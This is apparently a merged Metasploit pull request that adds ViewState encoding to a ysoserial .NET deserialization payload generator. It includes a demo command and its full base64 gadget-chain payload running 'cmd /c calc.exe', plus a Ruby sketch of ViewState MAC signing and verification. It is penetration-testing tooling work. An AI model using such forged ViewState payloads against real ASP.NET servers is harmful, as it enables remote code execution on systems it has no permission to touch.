
Feat/tool/ysoserial/viewstate #18899

Merged (7 commits), Mar 14, 2024

Conversation

zeroSteiner (Contributor)

This updates the existing tools/payloads/ysoserial/dot_net.rb tool to add options for encoding the resulting payload as a viewstate. There are currently three viewstate related options, of which only --viewstate-validation-key is required. The other options have reasonable defaults. To keep this code DRY, much of it was moved out of the mixin and into a Rex library that the CLI tool can access. Unit tests were added for this code.

There only appears to be a small handful of modules using the ViewState mixin. The easiest way I found to test it was to use the exploit/windows/http/plesk_mylittleadmin_viewstate module and invoke the method using Pry and the module's own default values.

By comparing the MD5 hash before and after the changes, and seeing that they are the same, we can determine that the functionality was maintained after the code was refactored into the Rex library.

[1] pry(#<Msf::Modules::Exploit__Windows__Http__Plesk_mylittleadmin_viewstate::MetasploitModule>)> OpenSSL::Digest::MD5.hexdigest(generate_viewstate_payload('calc.exe', key: VIEWSTATE_VALIDATION_KEY, extra: [VIEWSTATE_GENERATOR.to_i(16)].pack('V')))
=> "2cf2aeae80ca97ea6fe5499730feadad"

Testing

  • See that the unit tests pass
  • Load up an unmodified version of msfconsole (one without these changes) and use the plesk_mylittleadmin_viewstate module and take note of the MD5 hash using the Pry command from above
  • Load up msfconsole with these changes and repeat the process, see that the MD5 hash is the same showing the resulting blobs are identical
  • Use the new tools/payloads/ysoserial/dot_net.rb options to encode viewstates
    • Make sure that the help output makes sense
    • Try out all three options
    • See that invalid values are caught and reported in a way that makes sense

Demo

./dot_net.rb -c "calc.exe" -f LosFormatter -g TextFormattingRunProperties \
    --viewstate-validation-key deadbeef --viewstate-generator deadbeef --viewstate-validation-algorithm HMACSHA256
Calling `DidYouMean::SPELL_CHECKERS.merge!(error_name => spell_checker)' has been deprecated. Please call `DidYouMean.correct_error(error_name, spell_checker)' instead.
Gadget chain: TextFormattingRunProperties
Formatter:    LosFormatter
Size:         1016
/wEy1AUAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAAD2AzxSZXNvdXJjZURpY3Rpb25hcnkgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiIgeG1sbnM6WD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiIHhtbG5zOlM9ImNsci1uYW1lc3BhY2U6U3lzdGVtO2Fzc2VtYmx5PW1zY29ybGliIiB4bWxuczpEPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5EaWFnbm9zdGljczthc3NlbWJseT1zeXN0ZW0iPjxPYmplY3REYXRhUHJvdmlkZXIgWDpLZXk9IiIgT2JqZWN0VHlwZT0ie1g6VHlwZSBEOlByb2Nlc3N9IiBNZXRob2ROYW1lPSJTdGFydCI+PE9iamVjdERhdGFQcm92aWRlci5NZXRob2RQYXJhbWV0ZXJzPjxTOlN0cmluZz5jbWQ8L1M6U3RyaW5nPjxTOlN0cmluZz4vYyBjYWxjLmV4ZTwvUzpTdHJpbmc+PC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz48L09iamVjdERhdGFQcm92aWRlcj48L1Jlc291cmNlRGljdGlvbmFyeT4L+DRPQ761U2uRllbktXLn0v/WI9aNMDrpO+CDt30o6fQ=

Closes #18894
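The MAC step that the new --viewstate-validation-key / --viewstate-generator / --viewstate-validation-algorithm options drive, as an added illustration rather than the Rex library's or the PR's own code; it assumes the ASP.NET LosFormatter layout (HMAC over the serialised data plus the generator as a 4-byte little-endian value, appended to the data, then base64) and includes the verify side a server relies on to reject forged blobs:

```ruby
require 'openssl'

# Added illustration of the MAC step behind the new --viewstate-* options.
# Not the Rex library's or the PR's code. Assumed layout (ASP.NET LosFormatter
# style): MAC = HMAC(key, data || generator as 4-byte little-endian), appended
# to the serialised data, then base64-encoded.
module ViewStateDemo
  # .NET validation algorithm names mapped to OpenSSL digest names (assumed set;
  # "SHA1" in web.config terms means HMAC-SHA1 for ViewState).
  DIGESTS = {
    'HMACSHA256' => 'sha256',
    'HMACSHA384' => 'sha384',
    'HMACSHA512' => 'sha512',
    'SHA1'       => 'sha1'
  }.freeze

  # Recompute the MAC the server expects for +data+ under a hex validation key.
  def self.mac(data, key:, generator:, algo:)
    digest = DIGESTS.fetch(algo) { raise ArgumentError, "unknown algorithm: #{algo}" }
    key_bytes = [key].pack('H*')
    extra = [generator.to_i(16)].pack('V') # 32-bit generator, little-endian
    OpenSSL::HMAC.digest(digest, key_bytes, data.b + extra)
  end

  # Producer side: serialised payload bytes -> base64 __VIEWSTATE string.
  def self.encode(data, key:, generator:, algo: 'HMACSHA256')
    [data.b + mac(data, key: key, generator: generator, algo: algo)].pack('m0')
  end

  # Constant-time byte comparison so a forged tag leaks no timing signal.
  def self.equal?(a, b)
    return false unless a.bytesize == b.bytesize
    a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
  end

  # Consumer side: return the protected data only if its MAC verifies, else nil.
  # A server must refuse to deserialise anything that fails this check.
  def self.verify(blob, key:, generator:, algo: 'HMACSHA256')
    raw = blob.unpack1('m0') # strict base64; raises ArgumentError on junk
    mac_len = OpenSSL::Digest.new(DIGESTS.fetch(algo)).digest_length
    return nil if raw.bytesize <= mac_len
    data = raw.byteslice(0, raw.bytesize - mac_len)
    tag = raw.byteslice(raw.bytesize - mac_len, mac_len)
    equal?(mac(data, key: key, generator: generator, algo: algo), tag) ? data : nil
  rescue ArgumentError, KeyError
    nil
  end
end
```

With a wrong key, a wrong generator, a flipped byte or malformed base64, `verify` returns nil, which is the point at which a hardened endpoint stops before any deserialisation happens.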

@zeroSteiner zeroSteiner force-pushed the feat/tool/ysoserial/viewstate branch from 2a8c0f6 to bcb4e3a Compare February 29, 2024 21:56
@mubix (Contributor)

mubix commented Mar 8, 2024

I can't really anonymize things enough to post, just want to say that this script worked amazingly for me recently. Thanks @zeroSteiner

@adfoster-r7 adfoster-r7 merged commit 55dd5aa into rapid7:master Mar 14, 2024
48 checks passed
@adfoster-r7 (Contributor)

Release Notes

Updates the tools/payloads/ysoserial/dot_net.rb tool to add options for encoding the resulting payload as a viewstate

@zgoldman-r7 zgoldman-r7 added the rn-enhancement release notes enhancement label Mar 15, 2024
Linked issue (closed by this PR): Update dot_net.rb with ViewState encoding